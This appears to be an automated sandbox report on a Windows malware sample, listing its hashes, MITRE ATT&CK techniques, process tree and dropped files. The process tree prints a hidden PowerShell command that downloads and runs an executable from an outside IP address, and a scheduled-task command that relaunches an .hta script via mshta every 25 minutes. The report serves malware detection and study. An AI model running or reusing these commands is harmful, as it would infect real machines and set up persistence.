Analysis
-
max time kernel
109s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20250207-en -
resource tags
arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system -
submitted
08-02-2025 03:04
Static task
static1
Behavioral task
behavioral1
Sample
2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe
Resource
win7-20241010-en
General
-
Target
2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe
-
Size
938KB
-
MD5
35175480aaf58a493e68cb0adc722d8b
-
SHA1
2b59ac7beda4cab50a10b0ea9a787c33151cd723
-
SHA256
2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd
-
SHA512
18b54f47363bd68636b2bab867226dca0233bceada0c06cc32487a1adcf28dc6003490fe1fe77d2ad25a876a36f0c589d5597b13dd4d1a3182ab6cb68f91f29d
-
SSDEEP
24576:QqDEvCTbMWu7rQYlBQcBiT6rprG8aejl:QTvC/MTQYxsWR7aej
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1952 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1952 powershell.exe -
Downloads MZ/PE file 2 IoCs
flow pid Process 55 544 Process not Found 4 1952 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2664 MicrosoftEdgeUpdate.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1908 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1952 powershell.exe 1952 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1952 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3236 2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe 3236 2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe 3236 2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3236 2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe 3236 2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe 3236 2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3236 wrote to memory of 3372 3236 2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe 86 PID 3236 wrote to memory of 3372 3236 2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe 86 PID 3236 wrote to memory of 3372 3236 2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe 86 PID 3236 wrote to memory of 2040 3236 2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe 87 PID 3236 wrote to memory of 2040 3236 2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe 87 PID 3236 wrote to memory of 2040 3236 2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe 87 PID 3372 wrote to memory of 1908 3372 cmd.exe 89 PID 3372 wrote to memory of 1908 3372 cmd.exe 89 PID 3372 wrote to memory of 1908 3372 cmd.exe 89 PID 2040 wrote to memory of 1952 2040 mshta.exe 91 PID 2040 wrote to memory of 1952 2040 mshta.exe 91 PID 2040 wrote to memory of 1952 2040 mshta.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe"C:\Users\Admin\AppData\Local\Temp\2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn H94t4ma5qqU /tr "mshta C:\Users\Admin\AppData\Local\Temp\XzcZNO5rG.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn H94t4ma5qqU /tr "mshta C:\Users\Admin\AppData\Local\Temp\XzcZNO5rG.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1908
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\XzcZNO5rG.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XKTM8K9HTR9BJ3FFLLA5QRV2IC8CNKHA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NkY0NkY3OTEtODk4QS00RDU4LUE1MzAtNjk3QkEwRDUxOUQwfSIgdXNlcmlkPSJ7MTUwRTU5NEQtQUM0Qy00NkEyLTlCQTUtREU2N0YzMzZGMjYwfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RkM3MDUwN0MtMEE4NS00Q0M4LThBMjUtM0FBM0JFNkFERDY5fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDU5MjEiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxODE5ODA3NzAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MjcwNDQwMDY3Ii8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2664
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
71KB
MD5e798107e3ef9c25538ea3b509d536143
SHA1888c2e365e76511ae3c48715b63a39c23dedce56
SHA2567c2cbf5c00aba468d7c95dad63f06a8cbc383dc9959a14dfe052e3465c879bfc
SHA5123a5bcd68f8f375dcd79350c3a8e5eb10955df9ca01230514cf002d0189404640f3d5a07aa6622a157c0058a48a38ed34648427d7bd670ede342351424edcbe72
-
Filesize
726B
MD5507bad4eba7d3f273c252112f6ee6aba
SHA1d264d90de875037d228b6415c915a4981eaf72e8
SHA2565fcd484c63818d84b6fc9ba873a3304dd9536e1582691aa1d122e12657752644
SHA5122b05f08758c061a4e1523dc7dcb57acaecdb54cabcd9fa26f78a5635c9630d0af1bd586af972d49e9fee279cbdaa50f1c7e655d0b2d0870974094765daae76f5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82